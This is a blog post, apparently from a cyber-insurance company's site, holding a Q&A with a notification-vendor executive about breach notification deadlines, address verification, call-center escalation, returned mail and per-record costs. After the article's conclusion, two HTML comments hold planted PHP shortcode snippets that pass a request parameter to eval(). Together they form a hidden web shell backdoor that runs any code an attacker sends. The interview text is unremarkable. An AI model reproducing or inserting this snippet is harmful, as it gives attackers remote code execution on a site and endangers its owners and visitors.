Crisis Data Breach Response: Notification

Posted by Mark Greisiger

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. The first focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or Federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong or weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has about your organization.  I heard an industry colleague say it best, “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail.  Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record.  The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach, however organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.

<!– [insert_php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/insert_php][php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/insert_php][php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/php] –>